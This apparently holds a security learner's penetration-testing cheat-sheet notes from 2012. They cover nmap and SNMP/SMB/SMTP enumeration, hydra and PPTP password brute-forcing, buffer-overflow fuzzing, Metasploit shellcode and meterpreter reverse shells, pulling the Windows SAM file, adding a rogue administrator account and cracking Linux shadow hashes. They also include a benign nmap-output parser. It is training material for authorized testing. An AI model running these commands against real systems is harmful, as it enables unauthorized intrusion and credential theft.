www.n1tr0g3n.com/?p=3869
12/30/12
nmap -PN 192.168.9.200-254 (this will also show open ports for each host)
nmap -A 192.168.9.201 (runs an aggressive scan: OS fingerprint, version scan, scripts and traceroute)
Check hosts for services (nmap/zenmap)
For NMAP
- nmap -sS 192.168.9.254 (TCP)
- nmap -sU 192.168.9.254 (UDP)
(Could be better to do this in zenmap and group servers by services)
DNS Lookups/Hostnames
For SNMP
- snmpenum -t 192.168.0.100 (displays all SNMP information for that server)
For SMTP
- nc -v <mailserver> 25 - will give the mailserver version. Can also VRFY to find valid usernames/email accounts
For SMB
- smbserverscan
- metasploit auxiliary scanner: ./msfconsole, then show, use scanner/smb/version, set RHOSTS 192.168.0.1-192.168.0.254, run
- nmap -sT -p 445 192.168.9.200-254 -oG smb_results.txt (then grep for open sessions)
- ./samrdump.py 192.168.9.201 (on my machine /root/offsec; run against the hosts found open above)
For SNMP
- nmap -sT -p 161 192.168.9.200-254 -oG snmp_results.txt (then grep)
- snmpwalk -c public -v1 192.168.9.201 1 | grep 77.1.2.25 | cut -d " " -f4
For SMTP (/pentest/enumeration/vrfy)
- ./smtp_VRFY.py <mailserver IP> ** NEED TO MAKE THREADED, VERY SLOW **
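The "then grep" step after the -oG scans above, as an added Python example that is not from the original post: it parses nmap grepable output and lists only the hosts where a given port is reported open, so follow-up checks run against those hosts rather than the whole range. The sample output is constructed to match the -oG line format, not captured from a real scan.

```python
import ipaddress

# Constructed sample of nmap grepable (-oG) output in the shape written by
# "nmap -sT -p 445 192.168.9.200-254 -oG smb_results.txt"; not a real capture.
SAMPLE_OG = """# Nmap 6.25 scan initiated Sun Dec 30 12:00:00 2012 as: nmap -sT -p 445 -oG smb_results.txt 192.168.9.200-254
Host: 192.168.9.200 ()\tStatus: Up
Host: 192.168.9.200 ()\tPorts: 445/closed/tcp//microsoft-ds///
Host: 192.168.9.201 ()\tStatus: Up
Host: 192.168.9.201 ()\tPorts: 445/open/tcp//microsoft-ds///
Host: 192.168.9.203 (fileserver)\tStatus: Up
Host: 192.168.9.203 (fileserver)\tPorts: 445/open/tcp//microsoft-ds///, 139/filtered/tcp//netbios-ssn///\tIgnored State: closed (1)
# Nmap done at Sun Dec 30 12:00:05 2012 -- 55 IP addresses (3 hosts up) scanned in 5.01 seconds
"""


def parse_grepable(text):
    """Map each host IP to {port: (state, proto, service)} from -oG text."""
    results = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # "# Nmap ..." comment lines carry no host data
        fields = line.split("\t")  # -oG separates Host/Ports/Ignored State by tabs
        ip = fields[0].split()[1]
        port_fields = [f for f in fields[1:] if f.startswith("Ports:")]
        if not port_fields:
            continue  # "Status: Up" lines list no ports
        for entry in port_fields[0][len("Ports:"):].split(","):
            # each entry: port/state/proto/owner/service/rpc/version/
            parts = entry.strip().split("/")
            if len(parts) < 5:
                continue
            port, state, proto, _owner, service = parts[:5]
            results.setdefault(ip, {})[int(port)] = (state, proto, service)
    return results


def hosts_with_open_port(text, port, proto="tcp"):
    """IPs reporting port/proto as open, in numeric address order."""
    hits = [ip for ip, ports in parse_grepable(text).items()
            if port in ports and ports[port][:2] == ("open", proto)]
    return sorted(hits, key=ipaddress.ip_address)


if __name__ == "__main__":
    for ip in hosts_with_open_port(SAMPLE_OG, 445):
        print(ip)  # only these hosts need the follow-up check
```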
Crack Passwords (hydra/THC bruter) (need mil-dict.txt from Milw0rm cracked hashes)
POP3
- hydra -l <username> -P mil-dict.txt -f <MAIL SERVER> pop3 -V (may need to use -t 15 to limit concurrent connections)
MS VPN
- dos2unix words (whatever word list)
- cat words | thc-pptp-bruter <VPN server>
Look for known vulnerable services (refer to nmap/zenmap output). Check versions of software (by either SNMP enumeration or nmap/zenmap) against http://www.milw0rm.com/search.php or http://www.securityfocus.com/vulnerabilities or http://www.exploit-db.com
Some exploits may be written for compilation under Windows, while others for Linux. You can identify the environment by inspecting the headers: cat exploit | grep #include
Windows: process.h, string.h, winbase.h, windows.h, winsock2.h
Linux: arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/socket.h, sys/types.h, unistd.h
cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d : -f1 | sort -u
LINUX
WINDOWS
- cd /root/.wine/drive_c/MinGW/bin
- wine gcc -o ability.exe ability.c -lwsock32
- wine ability.exe (to run compiled file)
Wireshark Filters
FUZZING STEPS ASH STYLE
1. Determine target application and operating system
2. Obtain a copy of the application
3. Analyse the RFC & communication protocols
4. Discover & record crash conditions
5. Analyse crash conditions for exploitation opportunities
Things we need to know
- Which 4 bytes overwrite EIP
- Do we have enough space in the buffer for shellcode
- Is this shellcode easily accessible in memory
- Does the application filter out any characters
- Will we encounter overflow protection mechanisms
(*** HANDY framework3/tools -> nasm_shell.rb => JMP ESP ***)
Creating pattern for EIP location
- framework3/tools -> pattern_create.rb <length> >> Fuzzing_script (will append to the end of the script), then look in ollydbg for the pattern (need to reverse it and convert)
- pattern_offset.rb <EIP PATTERN> will show the byte offset
Creating shellcode (in framework3)
- ./msfpayload | grep -i shell
- ./msfpayload O (for options)
- ./msfpayload C (to create)
** TAKE NOTE OF SHELLCODE SIZE AND ADJUST FINAL BUFFER TO SUIT **
CAN ALSO USE FRAMEWORK2 MSFWEB INTERFACE (super easy)
-p payloads, -t test, -e exploit
MSFCONSOLE
- sessions -l => list created sessions
- sessions -i # => interact with specific session number
- show options
- search <string>
- use exploit/..
- set PAYLOAD ..
- exploit
Meterpreter Payloads (p260)
payload = windows/meterpreter/reverse_tcp
meterpreter> help (lists all commands)
- upload <file> c:\\windows
- download c:\\windows\\repair\\sam /tmp
- ps (running tasks)
- execute -f cmd -c (creates a new channel with the cmd shell)
- interact # (interacts with channel)
Other useful windows commands
- net user ash my_password /add
- net localgroup administrators ash /add
Passwords & Hashes
Windows SAM => %systemroot%\Repair (pwdump or fgdump p340), or use the framework meterpreter shell => gethashes
Linux => /etc/passwd & /etc/shadow
John The Ripper for linux => unshadow the passwd & shadow files into another file, then ./john hashes.txt